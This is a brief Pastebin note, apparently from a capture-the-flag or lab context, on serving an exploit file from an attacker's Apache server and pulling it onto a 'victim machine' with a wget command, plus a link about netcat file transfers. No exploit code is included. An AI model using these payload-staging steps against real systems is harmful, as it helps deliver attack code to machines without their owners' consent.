Advertisement
Guest User

apache

a guest
Feb 22nd, 2018
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.36 KB | None | 0 0
  1. Local machine:
  2. systemctl start apache2.service
  3. ip a ; find yourvpn its looks something like 10.10.10.x (x is a number here )
  4. put your exploit in /var/www/html/
  5.  
  6. to test go to your webbrowser
  7. https:10.10.10.x/exploitfile
  8. https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/
  9. on victim machine
  10. wget http://10.10.10.x/exploitfile -O /home/username/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement